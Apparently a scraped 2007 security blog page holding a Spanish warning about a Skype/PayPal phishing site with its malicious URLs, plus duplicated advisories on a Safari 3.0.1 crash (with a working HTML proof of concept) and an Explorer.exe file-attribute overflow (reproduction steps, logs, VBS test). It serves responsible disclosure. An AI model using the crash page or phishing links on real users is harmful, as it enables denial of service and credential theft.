skype.com/5746464646/bookf.htm
asi como los posibles datos de nuestra targeta visa y/o mastercard.

aseguraos de que las direcciones que visitais son las autenticas
de los sitios de pago, si no,no introducir ningun dato en ellas y
aun siendo lejitimas , deberiais desconfiar igualmente.
################## €nd ###################################
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Skype Phishing and other pay methoth Scam
###############################################
Hoy me llego un correo solicitandome que actualizara
La informacion de mi cuenta de skype (sistema que no uso)
Es una nueva forma de hacerse con las contraseñas de los
incautos usuarios;pero esto va un poco mas lejos.
Si por desgracia accedemos a la web malefica:
http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/login.html
ademas de perder nuestra cuenta de skype tenemos mucho
mas que perder.pues la pagina malefica, ademas intentara
por medio de engaño hacerse con varias de nuestras
contraseñas o datos importantes de nuestras formas
de pago por internet.
http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/c2.php
Nuestra cuenta de PayPal :
http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/PayPal%20-%20Log%20In.htm
nuestra cuenta de MoneyBrookers
http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/book1.htm
http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/bookf.htm
asi como los posibles datos de nuestra targeta visa y/o mastercard.
aseguraos de que las direcciones que visitais son las autenticas
de los sitios de pago, si no,no introducir ningun dato en ellas y
aun siendo lejitimas , deberiais desconfiar igualmente.
################## €nd ###################################
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Safari 3.0.1 (552.12.2) for windows corefoundation.dll DoS
Saturday, June 16, 2007
############################################
Safari 3.0.1 (552.12.2) for windows corefoundation.dll DoS
Vendor Url:www.apple.com/safari/
Advisore:http://lostmon.blogspot.com/2007/06/
safari-301-552122-for-windows.html
Vendor notify:yes exploit available:yes
BID:http:24497
###########################################
Safari contains a flaw that may allow a remote denial of service.
The issue is triggered when specially crafted input is processed
by the web browser. The crashes occur due to issues with the
functions to manage the History and all History,and will result
in loss of availability for the application.I don´t know if this
can execute arbitrary code.
#############
versions:
#############
Safari 3.0.1
###########
solution:
###########
Update to version 3.0.2
##########
timeline:
##########
discovered:14-06.2007
vendor notify:15-06-2007
vendor response:
disclosure:16-06-2007
#####################
details of the crash
#####################
see the screen shoot:
http://www.spymac.com/upload/2007/06/15/iBvYpCnJFW.gif
--
Crash !
AppName: safari.exe AppVer: 3.522.12.2 ModName: corefoundation.dll
ModVer: 1.434.6.0 Offset: 000097cd
#################
Safari Crash Poc
#################
save this file as html document and open it in safari
put some number in the second form and safai crash.
<html><Title>Safari 3.0.1 beta for windows Crash Poc By Lostmon</title>
<body>
<p>Safari 3.0.1 beta for windows Crash Poc By Lostmon (Lostmon@Gmail.com )</p>
<p> Put some number in the second form for crash Safari</p>
<form id="historyForm1" method="GET" action="#">
<input type="text" id="currentIndex1" name="currentIndex" value="sss">
<textarea id="historyLocation1" name="historyLocation"></textarea>
<form id="historyForm2" method="GET" action="#">
<input type="text" id="currentIndex2" name="currentIndex">
<textarea id="historyLocation2" name="historyLocation"></textarea>
</form></form></body></html>
#################### €nd #####################
Thnx to estrella to be my ligth
Thnx to all Lostmon´s Groups
Thnx to all Who belive in me !!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Safari 3.0.1 (552.12.2) for windows corefoundation.dll DoS
Vendor Url:www.apple.com/safari/
Advisore:http://lostmon.blogspot.com/2007/06/
safari-301-552122-for-windows.html
Vendor notify:yes exploit available:yes
BID:http:24497
###########################################
Safari contains a flaw that may allow a remote denial of service.
The issue is triggered when specially crafted input is processed
by the web browser. The crashes occur due to issues with the
functions to manage the History and all History,and will result
in loss of availability for the application.I don´t know if this
can execute arbitrary code.
#############
versions:
#############
Safari 3.0.1
###########
solution:
###########
Update to version 3.0.2
##########
timeline:
##########
discovered:14-06.2007
vendor notify:15-06-2007
vendor response:
disclosure:16-06-2007
#####################
details of the crash
#####################
see the screen shoot:
http://www.spymac.com/upload/2007/06/15/iBvYpCnJFW.gif
--
Crash !
AppName: safari.exe AppVer: 3.522.12.2 ModName: corefoundation.dll
ModVer: 1.434.6.0 Offset: 000097cd
#################
Safari Crash Poc
#################
save this file as html document and open it in safari
put some number in the second form and safai crash.
<html><Title>Safari 3.0.1 beta for windows Crash Poc By Lostmon</title>
<body>
<p>Safari 3.0.1 beta for windows Crash Poc By Lostmon (Lostmon@Gmail.com )</p>
<p> Put some number in the second form for crash Safari</p>
<form id="historyForm1" method="GET" action="#">
<input type="text" id="currentIndex1" name="currentIndex" value="sss">
<textarea id="historyLocation1" name="historyLocation"></textarea>
<form id="historyForm2" method="GET" action="#">
<input type="text" id="currentIndex2" name="currentIndex">
<textarea id="historyLocation2" name="historyLocation"></textarea>
</form></form></body></html>
#################### €nd #####################
Thnx to estrella to be my ligth
Thnx to all Lostmon´s Groups
Thnx to all Who belive in me !!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Buffer overflow in extended file atributes in Explorer.exe
Monday, June 04, 2007
#######################################################
Explorer.exe 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
Buffer overflow in extended file atributes.
Vendor url: http://www.microsoft.com/
Advisore:http://lostmon.blogspot.com/2007/06/
buffer-overflow-in-extended-file.html
Vendor notify:yes Vendor confirmed:yes Exploit include:NO
#######################################################
################
SUMARY:
################
1- History (how and why)
2-explanation of buffer overflow
3-versions tested
4-solution
5-timeline
6-response from vendor
7-Test
8-related vulns and documentations
####################
1-History:
####################
If we look this m$ advisory the information in section :
http://www.microsoft.com/technet/security/advisory/933052.mspx
--
Mitigating Factors for Microsoft Word Remote Code Execution Vulnerability:
The vulnerability cannot be exploited automatically through e-mail.
For an attack to be successful, a user must open an attachment that
is sent in an e-mail message.
--
this is not all true :)
If the user download the file and put in a folder , wen open the
folder explorer crash...
If you open any program, what use windows API and ole32.dll for
open files,and you go to file/open and go to the folder with the
malformed doc file, explorer call ole32.dll and the program is
crashed and loosing all information not save.
Examples of this case :
notepad++ => http://notepad-plus.sourceforge.net/es/site.htm
(vendor notify on 27-05-2007 via Email (no response)
Multiple Macromedia family programs => http://www.macromedia.com
(Adobe vendor informed on 27-05-2007 via webform and Confirmed.
http://www.adobe.com/misc/securityform.html)
multiple others programs are afected.
Affter a simple study on the malformed word document exploit /vulns
i have a little observation and i think that this vuln could be done
in some other programs,not only in a word appz.
Affter monitoring explorer and some dlls i think what this is only
the first point of the iceberg.The overflow is done wen explorer
call the kernel module KERNEL32, wen make some system calls to
manage the information of any file whith ntdll.dll
In the function GetFileAttributesExW and GetFileAttributesW
(KERNEL32) and in the undocumented functions NtQueryInformationFile,
NtQueryDirectoryFile and NtSetInformationFile functions on ntdll.dll
Those functions obtain the extended file atributes if the information
is to long in subfunctions FileAllInformation() in FileNameInformation()
and other (look in file_information_class) we obtain a buffer overflow,
some others subfunctions can get the same error.
Windows show the extended file attributes in multiple parts of the system,
wen look a foñder, wen put the mouse over a file or a folder.
Other applications use the same files for do the same :)
#######################
2-Explanation
#######################
A local buffer overflow exists in the windows explorer .
The extended file atributes functions have a small size of the buffer in 'FileAllInformation(),FileNameInformation' and other subfunctions in
Undocumented functions of NTDLL , resulting in a buffer overflow. With
a unknow impact.
This is the size of buffer in this related functions
and the main function involved
FileAllInformation
// 18 FILE_ALL_INFORMATION 0x68 NtQueryInformationFile
FileNameInformation
// 9 FILE_NAME_INFORMATION 0x08 NtQueryInformationFile
other functions can be vulnerables too
look this table:
http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/File/FILE_INFORMATION_CLASS.html
wen we put the hand over a file explorer.exe call the extended
file attributes and show this information in a 'bubble' or wen
open a folder explorer look for obtain directory listing, name
files and other information about the files.
how to locate the overflow ?
1-create a new txt file for example explorer.txt
2-rigth click on the file and try propierties
3-in all of the boxes (author ,tittle ,subject,and in special
in comment text area) write multiples A for example or moore:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
4-use filemon http://www.microsoft.com/technet/
sysinternals/FileAndDisk/Filemon.mspx
and include process explorer.exe
5-click on the txt propierties and click on accept or on aply .
6-go to filemon and look the log for explorer.exe you have some
similar to this :
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA FILE
NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA SUCCESS
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA FILE
NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Options:
Create Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER
OVERFLOW FileFsAttributeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Position:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Length:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Length:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER
OVERFLOW FileAllInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA FILE
NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER
OVERFLOW FileAllInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Options:
OverwriteIf Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA BUFFER
OVERFLOW FileFsAttributeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position:
88
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:
88
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:
88
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER
OVERFLOW FileAllInformation
21:24:00.046 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position:
30996
21:24:00.046 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation
the overflow is done :)
affter you can put the hand over the file and explorer show the extended file atributes
and some times filemon mark again the overflow
###################
3-versions tested
###################
i only test with :
Microsof windows XP Home edition all fixes 17/05/2007
Explorer.exe 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
###################
4-Solution
###################
Wait for a update or patch
####################
5-Timeline:
####################
Discovered:12-03-2007
Vendor notify:19-03-2007
Vendor response:22-03-2007
Private disclosure:17-05-2007
Public disclosure:04-06-2007
######################
6-Response from vendor
######################
Thank you for checking up on this case, We have concluded
our investigations on this matter and have found this crash
to be un-exploitable. This vulnerability is very similar to
another milworm posting (http://www.milw0rm.com/exploits/3419.
As we have not been able to find an exploitable angle for
this issue this crash will get tracking into the next available
Service Pack fix.
#####################
7- Test
#####################
1 download this exploit:
http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar
put uncompress it in c:\test or edit in EFA_test.vbs the correct
path were you put the malformed doc file.
2 copy EFA_test.vbs and edit the correct path to file.
3 execute EFA_test.vbs
the file look for the exteded file attributes
of the malformed doc file and wen try to read
the attribute "author" windows Scripting host
Is crashing.
Other overflows could be done in all boxes of
the file propperties.
The applications is crashing because we for look
the malformed doc file use a vbs script.
if any other aplication try to look the malformed
doc file crash too.
this is a simple test using a existing exploit for
microsoft ole32dll.dll , but the overflow is moore deep
is in ntdll.dll because ntdll.dll is the library what use
NtQueryInformationFile for obtain the extended file attributes.
is for that that this overflow it is posible to be
done in all file type with a malformed extended file attributes.
########################################
8-related vulns and documentations
########################################
########################
EFA_test.vbs
########################
Dim arrHeaders(35)
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace("C:\test")
For i = 0 to 34
arrHeaders(i) = objFolder.GetDetailsOf(objFolder.Items, i)
Next
For Each strFileName in objFolder.Items
For i = 0 to 34
Wscript.Echo i & vbtab & arrHeaders(i) _
& ": " & objFolder.GetDetailsOf(strFileName, i)
Next
Next
###################
RELATED VULNS :
###################
http://secunia.com/advisories/10020/
http://secunia.com/advisories/10194/
http://osvdb.org/displayvuln.php?osvdb_id=31885
http://osvdb.org/displayvuln.php?osvdb_id=31886
http://osvdb.org/displayvuln.php?osvdb_id=31887
###################
Related Exploit
###################
http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar
#################
Related Microsoft
security bulletin
#################
http://www.microsoft.com/technet/security/advisory/933052.mspx
##################
RElated functions
##################
extended file attributes
http://en.wikipedia.org/wiki/Extended_file_attributes
GetExtFileProperties()
http://www.kixtart.org/forums/ubbthreads.php?ubb=showflat&Number=160880&page=1
File information class:
http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/
NT%20Objects/File/FILE_INFORMATION_CLASS.html
posible source code of ntdll
http://www.cybertech.net/~sh0ksh0k/projects/old/win32toolkit/ntdll.c
http://www.cybertech.net/~sh0ksh0k/projects/old/win32toolkit/ntdll.h
http://source.winehq.org/source/dlls/ntdll/file.c
the links of ntdll.c and ntdll.h aparently are dead you can try
to search it in google´s cache, sorry for the inconvenience
###############################€nd#########################
thnx To estrella to be my ligth
Thnx To FalconDeOro Hi is investigate and documented with me this issue.
Thnx to Icaro and Badchecksum Team for interesting in research.
Thnx To Jkouns and Jericho for his patience.
Thnx to All osvdb Maglers they are involved in a very nice project.
Thnx to Secunia Research Team They make a Very Good Co-Work with the researchers
They put in my hands all what i need in this and others researchs.
Thnx to All Lostmon´s Group Team
Thnx to Microsoft for the responses.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Explorer.exe 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
Buffer overflow in extended file atributes.
Vendor url: http://www.microsoft.com/
Advisore:http://lostmon.blogspot.com/2007/06/
buffer-overflow-in-extended-file.html
Vendor notify:yes Vendor confirmed:yes Exploit include:NO
#######################################################
################
SUMARY:
################
1- History (how and why)
2-explanation of buffer overflow
3-versions tested
4-solution
5-timeline
6-response from vendor
7-Test
8-related vulns and documentations
####################
1-History:
####################
If we look this m$ advisory the information in section :
http://www.microsoft.com/technet/security/advisory/933052.mspx
--
Mitigating Factors for Microsoft Word Remote Code Execution Vulnerability:
The vulnerability cannot be exploited automatically through e-mail.
For an attack to be successful, a user must open an attachment that
is sent in an e-mail message.
--
this is not all true :)
If the user download the file and put in a folder , wen open the
folder explorer crash...
If you open any program, what use windows API and ole32.dll for
open files,and you go to file/open and go to the folder with the
malformed doc file, explorer call ole32.dll and the program is
crashed and loosing all information not save.
Examples of this case :
notepad++ => http://notepad-plus.sourceforge.net/es/site.htm
(vendor notify on 27-05-2007 via Email (no response)
Multiple Macromedia family programs => http://www.macromedia.com
(Adobe vendor informed on 27-05-2007 via webform and Confirmed.
http://www.adobe.com/misc/securityform.html)
multiple others programs are afected.
Affter a simple study on the malformed word document exploit /vulns
i have a little observation and i think that this vuln could be done
in some other programs,not only in a word appz.
Affter monitoring explorer and some dlls i think what this is only
the first point of the iceberg.The overflow is done wen explorer
call the kernel module KERNEL32, wen make some system calls to
manage the information of any file whith ntdll.dll
In the function GetFileAttributesExW and GetFileAttributesW
(KERNEL32) and in the undocumented functions NtQueryInformationFile,
NtQueryDirectoryFile and NtSetInformationFile functions on ntdll.dll
Those functions obtain the extended file atributes if the information
is to long in subfunctions FileAllInformation() in FileNameInformation()
and other (look in file_information_class) we obtain a buffer overflow,
some others subfunctions can get the same error.
Windows show the extended file attributes in multiple parts of the system,
wen look a foñder, wen put the mouse over a file or a folder.
Other applications use the same files for do the same :)
#######################
2-Explanation
#######################
Extended file attributes is a file system feature that enables users to
associate computer files with metadata not interpreted by the filesystem,
whereas regular attributes have a purpose strictly defined by the filesystem
(such as permissions or records of creation and modification times). Unlike
forks, which can usually be as large as the maximum file size, extended
attributes are usually limited in size to a value significantly smaller than
the maximum file size. Typical uses can be storing the author of a document,
the character encoding of a plain-text document,or a checksum.
A local buffer overflow exists in the windows explorer .
The extended file atributes functions have a small size of the buffer in 'FileAllInformation(),FileNameInformation' and other subfunctions in
Undocumented functions of NTDLL , resulting in a buffer overflow. With
a unknow impact.
This is the size of buffer in this related functions
and the main function involved
FileAllInformation
// 18 FILE_ALL_INFORMATION 0x68 NtQueryInformationFile
FileNameInformation
// 9 FILE_NAME_INFORMATION 0x08 NtQueryInformationFile
other functions can be vulnerables too
look this table:
http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/File/FILE_INFORMATION_CLASS.html
wen we put the hand over a file explorer.exe call the extended
file attributes and show this information in a 'bubble' or wen
open a folder explorer look for obtain directory listing, name
files and other information about the files.
how to locate the overflow ?
1-create a new txt file for example explorer.txt
2-rigth click on the file and try propierties
3-in all of the boxes (author ,tittle ,subject,and in special
in comment text area) write multiples A for example or moore:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
